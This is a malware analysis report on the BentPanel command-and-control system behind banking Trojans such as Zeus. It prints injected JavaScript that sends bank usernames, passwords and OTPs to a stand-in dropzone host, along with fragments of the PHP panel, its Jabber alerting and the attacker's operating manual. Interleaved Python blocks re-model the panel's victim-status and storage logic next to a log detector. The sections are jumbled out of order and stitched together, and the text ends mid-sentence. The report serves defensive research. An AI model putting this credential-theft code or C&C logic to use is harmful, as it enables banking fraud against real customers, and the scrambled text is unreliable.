Command and Control Form grabber
In some cases the attacker will also use a Flash-based cookie capturing method to receive the victim's cookie. The injected code will include the following URL:

http://nfriedly.github.com/Javascript-Flash-Cookies/storage.swf

storage.swf belongs to SwfStore, a JavaScript library for cross-domain Flash cookies. It includes a swf file that handles the storage and a JavaScript interface for loading and communicating with the Flash file (getting-started instructions: http://nfriedly.com/techblog/2010/07/swf-for-javascript-cross-domain-flash-cookies; working example: http://nfriedly.github.com/Javascript-Flash-Cookies). The cookie is sent to the attacker's dropzone using this request:

http://dropzone.net/XXX/tXXXX.php?bname=demobank&GetCookie=

3. Once the attacker has the victim's information, the victim is asked to wait. While he is waiting, the transaction can be made.

[Screenshot: the Demo Bank login page (User Name, Password) with the injected message "Please wait while we check your account".]

VERSAFE Ltd Secure Login, 11 Moshe Levi St, UMI Building, Rishon Le Zion, Israel. Tel 972 3 9622655, Fax 972 3 9511433, info@versafe-login.com, www.versafe-login.com. Versafe Confidential, June 2012.
The TAN's administration panel

[Screenshot: Bent Admin, current time 09:24:10, menu Bank, Options, User Agent, Help, BotAdmin, DropAdmin (Netherlands, Portugal). Callouts mark the IP of the bot, the date and time, the minimum TAN value, the maximum TAN value and the attacker's transfer limitations.]

The transactions configurations

[Screenshot: Bent Admin, current time 08:40:51, the transaction and amount configuration options of a bank (BotAdmin and DropAdmin, Netherlands).]

The amount configurations

The User's Manual (originally in Russian)

Statuses:
- 0: the login screen is displayed while the victim is kept waiting for 5 minutes.
- 1: a token has been requested.
- 2: a token has been requested (again).
- 5: the login window is displayed while the victim waits 15 seconds.
- 999: access is blocked.

If you do not change a status of 0 (for example, you are not at the computer), then after we have waited 5 minutes the bot will be able to log in, and it sets itself to status 5. When the status changes from 0 to 1, the token is requested immediately. If the status stays at 1 and you do not change it within 5 minutes, the token is requested again.
[The de-obfuscated listing continues with the remaining state variables (…pts_started_empty, pnwrite_state = 1, jsess, msg) and a helper function taking arguments (…ByArgs(a)) that begins with var b, tag = false, error = false, element = false.]

Summary

- The Bentpanel is a very convenient platform to control the information received from the Trojans.
- It is very simple to implement and does not require any special skills from the attacker.
- It captures all of the information in an SQL database and logs it in TXT files as well.
- The platform is widely spread and very common in the wild, especially in Europe.
- The platform is equipped with real-time alerting of the attacker regarding attacks.
Example of the information received via the Jabber alerts

[Screenshot: the information as it is displayed to the attacker, e.g. "20120528 08:40:37 Incoming data, IP: …, Additional data: …, Login: …, Pasnummer: 093…, https://…" (values redacted in the report).]

Admin file

The file loads the attacker's management console. Loading this page provides him with the console that enables him to view, edit and manage his captured credentials. The page is usually password protected and looks like this:

[Screenshot: a password prompt with a Login button.]

Once the attacker enters his password he is able to review the captured information. There are more than a few management consoles with different types of functions, features and graphics. The most basic one looks like this:

[Screenshot: a plain table of captured entries listed by country and bank (onebank … fifthbank).]

Another example:

[Screenshot: the Bent Admin console, current time 08:37:30, with the menu Bank, Options, User Agent, Help, BotAdmin (Netherlands, Germany), DropAdmin (Netherlands).]
The system is widely spread since it is very simple to implement and very user-friendly. The system includes the following features:
- Creation of a users' credentials database (SQL and text files)
- Real-time victim alert via Jabber
- Custom skins for the management console

Recognition of the system

This kind of C&C can be identified according to the request that is sent from the infected computer to the location of the system. It is an HTTP GET: the injected code loads the dropzone URL as a script source, and the main file reads its parameters from $_GET. The request usually contains the following parameters (this is the request sent from the user):

http://dropzone.net/xxx/xxx.php?bname=bankname&activ=&adata=Password=1234567 authcode=54321 https://demobank.com/Login2.0/RTLogbn/login.aspx?guid=a2c313c7-eca2-4224-a95f-9d9c3e050a97

bname is the bank's name; activ and adata carry the values captured from the bank's forms (here Password and authcode), followed by the bank's URL; the guid in that URL is the victim's identifier.

Another common identifier of the system is the waiting sign (a spinning-wheel GIF) that is injected for the user while the information is sent to the attacker and the transaction is executed. It usually carries the same name as the dropzone and can be found at:

http://dropzone.net/xxx/xxxxxxx_loading.gif

Important files
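The recognition rules above as runnable detection logic, added here as an example (it is not code from the report or from the panel): it scans constructed proxy log lines for the two indicators named, a GET to a .php endpoint carrying bname/activ/adata and the companion *_loading.gif request, and pulls the bank name, the captured fields, the originating page URL and the guid out of a hit. The log layout (timestamp, client IP, method, URL), the '|' separator between adata fields and the sample lines are assumptions; the separator is not legible in the report's examples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators from the report: a .php endpoint queried with bname/activ/adata,
# and a spinner GIF named <something>_loading.gif on the same dropzone.
REQUIRED_PARAMS = {"bname", "adata"}          # 'activ' is present but may be empty
LOADING_GIF_RE = re.compile(r"/[^/?#]*_loading\.gif$", re.IGNORECASE)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)


def parse_adata(adata, sep="|"):
    """Split the grabbed-form payload into field=value pairs plus the page URL the
    injected script appended (window.location). The '|' separator is an assumption."""
    fields, origin = {}, None
    for token in unquote(adata).split(sep):
        token = token.strip()
        if URL_RE.match(token):
            origin = token
        elif "=" in token:
            key, value = token.split("=", 1)
            fields[key.strip()] = value.strip()
    victim_guid = None
    if origin:
        victim_guid = parse_qs(urlsplit(origin).query).get("guid", [None])[0]
    return {"fields": fields, "origin": origin, "victim_guid": victim_guid}


def classify_request(method, url):
    """Return an indicator record for a single request, or None if it looks clean."""
    parts = urlsplit(url)
    if LOADING_GIF_RE.search(parts.path):
        return {"indicator": "loading_gif", "host": parts.hostname, "path": parts.path}
    # The beacon is a GET: the Trojan loads the dropzone URL as a <script src>,
    # and the main file reads its parameters from $_GET.
    if method.upper() == "GET" and parts.path.lower().endswith(".php"):
        query = parse_qs(parts.query, keep_blank_values=True)
        if REQUIRED_PARAMS.issubset(query):
            return {"indicator": "form_grabber_beacon", "host": parts.hostname,
                    "bank": query["bname"][0], **parse_adata(query["adata"][0])}
    return None


def scan_log(lines):
    """Proxy log lines are assumed as: '<timestamp> <client_ip> <METHOD> <url>'."""
    hits = []
    for line in lines:
        try:
            timestamp, client, method, url = line.split(maxsplit=3)
        except ValueError:
            continue                       # malformed line, skip it
        hit = classify_request(method, url)
        if hit:
            hits.append({"time": timestamp, "client": client, **hit})
    return hits


# Constructed sample traffic: one infected client, one clean login, one decoy POST.
SAMPLE_LOG = [
    "2012-05-28T08:40:37Z 10.0.0.5 GET http://dropzone.net/XXX/XXX.php"
    "?bname=demobank&activ=&adata=username=1234567|password=54321"
    "|https://demobank.com/login.php?guid=a2c313c7-eca2-4224-a95f-9d9c3e050a97",
    "2012-05-28T08:40:38Z 10.0.0.5 GET http://dropzone.net/XXX/XXXXXXX_loading.gif",
    "2012-05-28T08:41:02Z 10.0.0.7 GET https://demobank.com/login.php?guid=0f1e2d3c-0000-1111-2222-333344445555",
    "2012-05-28T08:41:05Z 10.0.0.9 POST http://cdn.example.net/api/track.php?bname=news&adata=x",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

On real proxy or IDS logs the pair worth alerting on is the beacon and the *_loading.gif request from the same client within seconds of each other; a bname/adata GET on its own will occasionally match unrelated PHP applications, so keep the field parse for triage rather than as the sole trigger.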
When the token is received, changing the status from 1 to 2 requests the token again immediately, as does changing it from 2 to 1. If the status stays at 2 and you do not change it within 5 minutes, the token is requested again. Changing the status to 999 blocks the entrance. Status 5 is given to those users whose status was 0 and who, after waiting five minutes, came to the site.

Options:
- Sender Pass: the password of the sender's Jabber account.
- Sender Jid: the Jabber ID of the sender; it can be registered anywhere.
- BentAdmin Pass: the admin password.
- Receiver Jid: your Jabber ID, which will receive the messages from the sender Jabber.
- Display Bot Limit: the number of bots displayed in the list of bots for each bank.
- Default status: the default status; if you are going to be away for a long time, it is better to set status 5.

List Bot:
- Bot Ip: the bot's IP.
- Time: date and time of the last call.
- Status: the bot's status.
- Query: the query which the bot requests with statuses 1 and 2.
- Min value: the minimum number of characters requested.
- Max Value: the maximum number of characters requested.
- Reserve1, Reserve2: reserved, not used.
- Comment: an additional comment or message which will be seen by bots with status 999, for example a phone number such as 555-55-555.
- Color: a color used for yourself, so that it is easier to find your way among the bots.
- Own Comment: your own comment, used as a note for yourself, for example to record the balance.
- Action: save the changes to a specific bot.

Show Actions:
- Search Bot by Ip: search the bots by the given IP.
- Status: search the bots by the desired status.
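The status rules in the manual above, restated as a small state machine (an added example constructed from the manual's text, not the panel's code): it returns what the injected script should show on each poll and applies the two automatic transitions the manual describes, the fall-through from 0 to 5 after five unattended minutes and the repeat token request after five minutes in status 1 or 2. The action names, the Bot record and the poll timings are assumptions.

```python
from dataclasses import dataclass

# Timings from the manual: five minutes for statuses 0, 1 and 2, fifteen
# seconds of "please wait" for status 5.
WAIT_LIMIT = 300
SHORT_WAIT = 15
VALID_STATUSES = (0, 1, 2, 5, 999)
# Operator transitions that make the client ask for a token right away.
IMMEDIATE_TOKEN = {(0, 1), (1, 2), (2, 1)}


@dataclass
class Bot:
    """One victim as the panel tracks it (assumed record; the manual lists more fields)."""
    status: int = 0          # the panel's default status
    status_age: int = 0      # seconds since the status was last set or acted on
    token_requests: int = 0  # how many times the TAN/OTP form has been (re)shown


def set_status(bot, new_status):
    """The operator changes the status in BentAdmin."""
    if new_status not in VALID_STATUSES:
        raise ValueError(f"unknown status {new_status}")
    if (bot.status, new_status) in IMMEDIATE_TOKEN:
        bot.token_requests += 1
    bot.status, bot.status_age = new_status, 0
    return bot


def poll(bot, elapsed=0):
    """Advance time by `elapsed` seconds and return what the injected script shows:
    'show_wait', 'request_token', 'allow_login' or 'block'."""
    bot.status_age += elapsed
    if bot.status == 999:
        return "block"
    if bot.status == 0:
        if bot.status_age < WAIT_LIMIT:
            return "show_wait"
        # Nobody reacted within five minutes: the manual says the bot is let
        # through and the panel moves it to status 5.
        bot.status, bot.status_age = 5, 0
    if bot.status == 5:
        return "show_wait" if bot.status_age < SHORT_WAIT else "allow_login"
    # Statuses 1 and 2: the token form is up. If the operator has not changed
    # the status for five minutes, the token is requested again.
    if bot.status_age >= WAIT_LIMIT:
        bot.token_requests += 1
        bot.status_age = 0
    return "request_token"


def attended_session():
    """Operator-driven run: wait, ask for a TAN, let it time out once, ask again, then block."""
    bot = Bot()
    actions = [poll(bot)]                 # the victim sees the wait screen
    set_status(bot, 1)                    # operator requests the first token
    actions.append(poll(bot, 10))
    actions.append(poll(bot, 300))        # five minutes pass unattended: re-request
    set_status(bot, 2)                    # operator asks for a second token
    actions.append(poll(bot, 1))
    set_status(bot, 999)                  # operator locks the victim out
    actions.append(poll(bot, 1))
    return actions, bot.token_requests


def unattended_session():
    """Nobody is at the panel: five minutes of waiting, 15 more seconds, then the login goes through."""
    bot = Bot()
    actions = [poll(bot, 299), poll(bot, 1), poll(bot, 15)]
    return actions, bot.status
```

The model makes the operational point of the manual visible: the victim's browser is never told anything final until a human at the panel acts, and a panel with nobody watching degrades to letting the victim in after five minutes, which is why the manual recommends leaving status 5 as the default when away.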
[Screenshot: the demo bank login page at 127.0.0.1/demobank/default.php, captured by the Trojan.]

The request that is sent from the user's browser after submitting the information (in this case to the demo bank) would be:

http://dropzone.net/XXX/XXX.php?bname=demobank&activ=&adata=username=1234567 password=54321 https://demobank.com/login.php?guid=a2c313c7-eca2-4224-a95f-9d9c3e050a97

This is the part of the injected code that sends the information to the dropzone; the request is sent to the main file:

```javascript
function o00000000000() {
  var head = document.getElementsByTagName('head')[0];
  var script = document.createElement('script');
  script.type = 'text/javascript';
  head.appendChild(script);
  // dropzoneUrl stands for the obfuscated variable (another o000...-style
  // name, not legible in this copy) that holds http://dropzone.net/XXX/XXX.php.
  // The separator between the adata fields is not legible either; a space is used here.
  script.src = dropzoneUrl + '?bname=demobank&activ=&adata='
             + 'username=' + document.getElementById('useraname').value
             + ' password=' + document.getElementById('password').value
             + ' ' + window.location;
}
```

After the user's credentials are captured by the Trojan, HTML injections are used to capture the user's OTP in order to conduct the automatic transaction. The attackers display different types of messages to the user in order to fool him into entering his OTP (token or TAN).
A sample of the code de-obfuscated (the list of all the variables that are used for the attack):

```javascript
var opacity_value = 0;
var opacity_object;                 // value not legible in this copy
var opacity_is_set = false;
var bpcTimeout;
var opacity_div          = document.getElementById('opacity_div');
var simple_wait_div      = document.getElementById('simple_wait_div');
var tan_div              = document.getElementById('tan_div');
var tan_div_operation_id = document.getElementById('tan_div_operation_id');
var tan_div_button       = document.getElementById('tan_div_button');
var tan_div_a            = document.getElementById('tan_div_a');
var tan_div_select       = document.getElementById('tan_div_select');
var tan_div_input_1      = document.getElementById('tan_div_input_1');
var tan_div_input_2      = document.getElementById('tan_div_input_2');
var tan_wait_img         = document.getElementById('tan_wait_img');
var login_input    = GetObjectByName(document, 'user_input', false);
var password_input = GetObjectByName(document, 'password_input', false);
var login_form     = GetObjectByName(document, 'Form_Auth_form', true);
/* target name not legible */ GetObjectByName(document, 'loginformi_form', true);
var login_form_onsubmit = GetAction(login_form, 'onsubmit');
var prig_tan1_input, prig_tan2_input, prig_card_select, prig_operation_id_label;
var login_empty, password_empty;
```
[Sidebar] 77% of infections are from legitimate sites. Most financial Trojans (e.g. Zeus) have long life spans and may go undetected by an anti-virus. Over 537 active Zeus crimeware domains are active worldwide.

Script injections

Recently several Trojan horses (i.e. Zeus, SpyEye, Carberp) started using script injection techniques in order to modify the original web page. The modification may enable the attacker to perform money transactions using the victimized users' credentials. This is perpetrated by a Trojan horse injecting malicious JavaScript code into the client's browser once the client is connected to the website. The injected code performs different functions, including attempting a money transfer from the client's account.

In order to maintain the information sent by the Trojans, the attackers have developed different types of command and control systems that enable them to grab and manage the information sent by the Trojan. The systems are usually PHP-based, accompanied by an SQL database.

[Screenshot: "Malicious Script in the source", the view-source of an infected page.]
Executing the automatic transaction

Two common ways:
- Injecting JavaScript on the client side that uses the captured user information (credentials, cookie and OTP) to perform the automatic transaction.
- Using an automated script on the server side that uses the victim's captured information in order to perform the transaction.

Both ways are found in the wild and can be used by the attacker. Here is a sample of JavaScript that is loaded on the victim's side and is able to perform the transaction. It is wrapped in Dean Edwards' "packer" (the eval(function(p,a,c,k,e,r){…}) header, which rebuilds the script from a base-36 keyword table with String and RegExp replace calls); only the unpacker header is legible in this copy, the packed payload is not:

```javascript
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}(
  /* packed payload, base, keyword count and keyword table: not legible in this copy */
))
```
- Own Comment: search the bots that have a certain mark for yourself in the Own Comment field.
- Search button.
- Search Logs: the log for the bank, duplicating what was sent to the recipient Jabber.
- Delete Text Log button: clear the text log of the bank.
- Delete User Agent Log button: clear the user agent log.
- Delete SQL Logs button: clear the list of bots.
- Delete All Logs button: clear the text logs of the bank, the user agent log and the list of bots.
- Delete Bot By Status button: remove from the list those bots that have a given status.
- Delete Bot By Comment button: remove from the list those bots that have a specific Own Comment.
- Enable/Disable Jabber button: enables or disables sending the bank's messages to Jabber; in the Off position the bank's new bots will automatically be put in status five.

The victim's side

The user connects to the bank's login page. The Trojan identifies the page as a target and injects the malicious code into the user's browser. The code captures the user's credentials and sends them to the attacker's drop zone:

http://dropzone.net/XXX/XXX.php?bname=bankname&activ=&adata=Password=1234567 authcode=54321 https://demobank.com/Login2.0/RTLogbn/login.aspx?guid=a2c313c7-eca2-4224-a95f-9d9c3e050a97
The C&C platform contains a few important files that enable it to capture the information that is sent from the victim. The most important files are:
- Main file: captures the information, logs it and delivers it to the database
- Database connection configuration file
- C&C management file
- Jabber connection

Main PHP

This file is the most important file on the platform. The request that is sent from the victim after the injection is delivered to this file, which parses the information, logs it and enters it into the database. The request that is sent from the victim looks like this:

http://dropzone.net/xxx/xxx.php?bname=bankname&activ=&adata=Password=1234567 authcode=54321 https://demobank.com/Login2.0/RTLogbn/login.aspx?guid=a2c313c7-eca2-4224-a95f-9d9c3e050a97

If we look at the XXX.php code we can see how it handles the information:

1. Connecting to the database: the main file includes the config file that contains the information that enables it to connect to the database (SQL).

2. The file verifies that the information received comes from a known bank; if not, the information is dropped. Please note: this verification doesn't appear in all the dropzones. Some of the main files create a new client according to the information that is received.

The server's configuration file variables (values redacted in the report):

```php
<?php
// The database connection parameters
$dbhost = '';
$dbuser = '';
$dbpass = '';
$dbname = '';
$default_status = 0;
// The Jabber connection credentials
$jabber_server = 'xmpp.jp';
$jabber_id = '';
$jabber_pass = '';
?>
```
Including the bank verification (xxxx.php file):

```php
<?php
// Requests that do not name a known bank are dropped. The parameter is taken
// to be bname, the bank-name field of the beacon; the bank list is redacted.
if (!isset($_GET['bname']) || !in_array($_GET['bname'], array(/* known banks */))) {
    die();
}
// Connecting to the database with the configuration parameters
$link = mysql_connect($dbhost, $dbuser, $dbpass);
if (!$link) {
    die(mysql_error());
}
if (!mysql_select_db($dbname)) {
    die(mysql_error());
}
```

3. Parsing the information and inserting it into the database (SQL) and the TXT file. The column and parameter names are redacted in the report's listing; the surviving calls show the flow:

```php
$data = mysql_real_escape_string($_GET[/* redacted */]);
if (isset($_GET[/* redacted */])) {
    /* ... */
}
$result = mysql_query(/* SELECT the bot record for this victim */)
    or die('Could not query: ' . mysql_error());
// Checking if it is the first recorded information from this victim
if (mysql_num_rows($result) > 0) {
    $row = mysql_fetch_assoc($result);
    mysql_query(/* UPDATE the record ... */ mysql_real_escape_string($_SERVER[/* redacted */]) /* ... */);
    if (mysql_num_rows($result) > /* ... */) {
        $result = mysql_query(/* ... */ intval(time()) /* ... */
                              mysql_real_escape_string($_SERVER[/* redacted */]) /* ... */ $row /* ... */);
    }
} else {
    $result = mysql_query(/* INSERT a new record ... */ intval(time()) /* ... */
                          mysql_real_escape_string($_SERVER[/* redacted */]) /* ... */ $default_status /* ... */);
}
```
helping them prevent harm to their brand image and avoid significant economic damage. Furthermore, Versafe provides professional services and advanced research capabilities in the field of cybercrime, including malware, Trojan horses, viruses and infringing material.

The Threat

Trojans are malware that appear to the user to perform a desirable function but, perhaps in addition to the expected function, steal information or harm the system. Two main techniques used by Trojans in order to steal the users' credentials or initiate money transactions on their behalf are:
- Modifying the website's client-side web page
- Sniffing the browser's activity for information which is sent to different banks, before the packets are encrypted by SSL

[Sidebar] Malware attacks have grown by 600% since 2008. Top 20 malwares: more than 1.25M infected computers. A new web page is infected every 1.3 seconds. 2M web pages are infected each month.

Versafe's knowledge is based on extensive research into the several forms of Trojan infections and on experience with cleaning infections and repairing the damage caused by zero-day threats. Our deep understanding of how the malware works is the key to producing the right defence mechanisms required to safeguard the information transmitted between the client and the organization.
[Sidebar, continued] It was developed by the Jabber open-source community in 1999. Built to be extensible, the protocol has been extended with features such as Voice over Internet Protocol and file transfer signalling.

The message that is sent via Jabber, as coded in the main file (the parameters are the Jabber ID, password and server from the configuration file):

```php
include /* the XMPPHP library file, name not legible */;
$conn = new XMPPHP_XMPP($jabber_server, 5222, $jabber_id, $jabber_pass,
                        /* resource, not legible */, null,
                        $printlog = true, $loglevel = LOGGING_INFO);
$conn->connect();
```

[Screenshot: the Jabber control panel (Bent Admin, current time 09:30:28, menu Bank, Options, User Agent, Help, BotAdmin Netherlands, DropAdmin Netherlands), with callouts for the message that is sent to the attacker and for the attacker's system password.]
```php
$logfile = fopen(/* the bank's TXT log file */, 'a');
fwrite($logfile, /* the request fields and */ $_SERVER[/* redacted */] /* ... */);
fclose($logfile);
```

Choosing the bank's parameters. Checking if the victim's IP exists in the database: if it does, its properties are modified, and if it doesn't, a new record is created. Logging the information into the bank's TXT file. Please note: the information that is received and logged in the TXT file is not checked or sanitized, which means it can contain any random information.

XMPP and Jabber

4. Informing the attacker of new information logged in the database via XMPP and Jabber. The XXXX.php file contains the connection parameters and functions and is included in the main file. Here is a sample of the XXXX.php file; it is the constructor of the XMPP class of the XMPPHP library, which the panel bundles:

```php
public function __construct($host, $port, $user, $password, $resource, $server = null,
                            $printlog = false, $loglevel = null) {
    parent::__construct($host, $port, $printlog, $loglevel);
    $this->user     = $user;
    $this->password = $password;
    $this->resource = $resource;
    if (!$server) $server = $host;
    $this->basejid = $this->user . '@' . $this->host;
    $this->roster = new Roster();
    $this->track_presence = true;
    $this->stream_start = '<stream:stream to="' . $server . '" xmlns:stream="http://etherx.jabber.org/streams" xmlns="jabber:client" version="1.0">';
    $this->stream_end   = '</stream:stream>';
    $this->default_ns   = 'jabber:client';
    $this->addXPathHandler('{http://etherx.jabber.org/streams}features', 'features_handler');
    $this->addXPathHandler('{urn:ietf:params:xml:ns:xmpp-sasl}success', 'sasl_success_handler');
    $this->addXPathHandler('{urn:ietf:params:xml:ns:xmpp-sasl}failure', 'sasl_failure_handler');
    $this->addXPathHandler('{urn:ietf:params:xml:ns:xmpp-tls}proceed', 'tls_proceed_handler');
}
```

[Sidebar] What are XMPP (Extensible Messaging and Presence Protocol) and Jabber? Extensible Messaging and Presence Protocol (XMPP, formerly named Jabber) is an open XML-based protocol originally aimed at near-real-time, extensible instant messaging (IM) and presence information (e.g. buddy lists), but now expanded into the broader realm of message-oriented middleware.
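The main file's steps 1 to 3 modelled in Python, as an added example written for this page (it is not the panel's PHP and does not reproduce it): validate the bank name against a known list, look the victim's IP up in a bots table and update the row or insert a new one with the default status, then append the request to the bank's TXT log. The table layout, column names, log format and sample requests are assumptions. The two log writers contrast what the report notes about the TXT file, that the data is written unsanitized, with an escaped form.

```python
import sqlite3
import time

KNOWN_BANKS = {"demobank"}   # stands in for the in_array() list of bank names
DEFAULT_STATUS = 0           # $default_status from the configuration file


def open_db():
    """In-memory stand-in for the panel's SQL database; the bots table is an assumed layout."""
    db = sqlite3.connect(":memory:")
    db.execute("""CREATE TABLE bots (ip TEXT PRIMARY KEY, bank TEXT, last_seen INTEGER,
                                     status INTEGER, query TEXT, user_agent TEXT)""")
    return db


def unsafe_log_line(now, ip, user_agent, adata):
    """What the report describes: request data appended to the bank's TXT file as received."""
    return f"{now}|{ip}|{user_agent}|{adata}\n"


def safe_log_line(now, ip, user_agent, adata):
    """Hardened variant: separators and line breaks in attacker-controlled fields are
    escaped, so a crafted User-Agent cannot forge a second record."""
    def esc(value):
        return (value.replace("\\", "\\\\").replace("|", "\\|")
                     .replace("\r", "\\r").replace("\n", "\\n"))
    return f"{now}|{ip}|{esc(user_agent)}|{esc(adata)}\n"


def handle_request(db, params, client_ip, user_agent, now=None, log=None):
    """Steps 1-3 of the main file. `params` is the parsed query string of the beacon.
    Returns 'dropped', 'inserted' or 'updated'."""
    bname = params.get("bname")
    if bname not in KNOWN_BANKS:                     # step 2: unknown bank, drop it
        return "dropped"
    now = int(time.time()) if now is None else now
    adata = params.get("adata", "")
    # Step 3: is this IP already known? Bound parameters replace the listing's
    # mysql_real_escape_string() calls.
    known = db.execute("SELECT 1 FROM bots WHERE ip = ?", (client_ip,)).fetchone()
    if known:
        db.execute("UPDATE bots SET bank = ?, last_seen = ?, query = ?, user_agent = ? WHERE ip = ?",
                   (bname, now, adata, user_agent, client_ip))
        outcome = "updated"
    else:
        db.execute("INSERT INTO bots VALUES (?, ?, ?, ?, ?, ?)",
                   (client_ip, bname, now, DEFAULT_STATUS, adata, user_agent))
        outcome = "inserted"
    if log is not None:                              # the bank's TXT log
        log.append(safe_log_line(now, client_ip, user_agent, adata))
    return outcome


def demo():
    """Constructed traffic: one victim reporting twice, one unknown bank, one forged User-Agent."""
    db, log = open_db(), []
    beacon = {"bname": "demobank", "activ": "", "adata": "username=1234567|password=54321"}
    first = handle_request(db, beacon, "203.0.113.10", "Mozilla/5.0", now=1338194437, log=log)
    second = handle_request(db, beacon, "203.0.113.10", "Mozilla/5.0", now=1338194500, log=log)
    dropped = handle_request(db, {"bname": "otherbank", "adata": "x"},
                             "203.0.113.11", "Mozilla/5.0", now=1338194501, log=log)
    bots = db.execute("SELECT COUNT(*) FROM bots").fetchone()[0]
    # A User-Agent carrying a newline forges a whole extra record in the unsanitized log.
    forged_ua = "Mozilla/5.0\n1338194600|198.51.100.1|curl|username=victim|password=x"
    unsafe_records = unsafe_log_line(1338194437, "203.0.113.10", forged_ua, "a=b").count("\n")
    safe_records = safe_log_line(1338194437, "203.0.113.10", forged_ua, "a=b").count("\n")
    return first, second, dropped, bots, len(log), unsafe_records, safe_records
```

For an investigator the useful part is the shape of the artifacts: a per-IP bots table keyed on the victim's address with a status and a timestamp, and a flat text log per bank (the delimiter here is assumed). The unsanitized log is also why entries in such a file cannot be trusted line by line: a single request with a newline in the User-Agent or in the grabbed form fields produces a record that never existed.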
[Screenshot: the HTML source of the demo bank page on the infected computer, with the injected <script language="javascript" src="http://…"> tag that loads the attacker's script (callouts: Dropzone, Infected computer).]

The Botnet architecture

In order to avoid shutdown and fast detection, the attacker uses several proxy servers under different domains that forward the information to the main server. This method enables the botnet to survive if one of the domains or servers is shut down. The basic structure looks like this:

[Diagram: infected computers report to domains that serve as proxies, which forward the information to the attacker's main server.]

BentPanel command and control platform

The Bentpanel C&C platform is a very simple platform written in PHP that has the ability to receive the victim's information, sort the information and display it to the attacker.
How it works

1. The victim gets a message related to new security steps needed for his account:

[Screenshot: the Demo Bank login page with the injected text: "Dear client, the main concern of the bank is and remains the highest possible level of service delivery for our customers, in compliance with all required quality and safety standards. Currently the security system is being updated and tested. Every step of the subsequent verification process can take up to 5 minutes. Be patient please and do not try to refresh the page while you follow these steps. To prevent unauthorized access to your bank account we want to be sure that exactly the real owner of this account …"]

2. The client is requested to enter his OTP:

[Screenshot: the Demo Bank login page (User Name, Password) with the injected text "Dear client, please provide us with your OTP in order to continue" and an OTP field.]

The information is delivered to the attacker's dropzone as well, as can be seen in the injected code (the request that is sent to the attacker includes the OTP):

```javascript
function o00000000000() {
  var head = document.getElementsByTagName('head')[0];
  var script = document.createElement('script');
  script.type = 'text/javascript';
  head.appendChild(script);
  // dropzoneUrl stands for the obfuscated variable (another o000...-style
  // name, not legible in this copy) that holds http://dropzone.net/XXX/XXX.php.
  // The separator between the adata fields is not legible either; a space is used here.
  script.src = dropzoneUrl + '?bname=demobank&activ=&adata='
             + 'username=' + document.getElementById('useraname').value
             + ' password=' + document.getElementById('password').value
             + ' ' + window.location;
}
```
Versafe Secure Login

Command and Control Form grabber: Trojans, ATC (Automatic transaction), Bent Admin

The material in this report is strictly confidential and contains proprietary information and ideas of Versafe Ltd. Versafe Confidential, June 2012.

Versafe Introduction (executive summary)

Versafe eliminates online identity theft and financial damages by preventing phishing, Trojan and pharming attacks. We also specialize in taking action to foil online fraud and in commencing the shutdown of websites hosting infringing material. Versafe offers products and services that complement existing anti-fraud technologies, improving the clients' protection against the aforementioned malicious activity and providing an encompassing defence mechanism. Versafe products are either software- or service-based, customized to the needs of each client individually. Versafe enables financial organizations working online to gain control over areas that were virtually unreachable and indefensible up till now, and to neutralize local threats found on their clients' personal computers without requiring the installation of software on the end-user side. The transparent solution does not alter the user experience in any way, facilitating a seamless installation on the firm's web sites. Versafe's one-of-a-kind solution has proven its exceptional effectiveness time and again in a large number of financial institutions worldwide,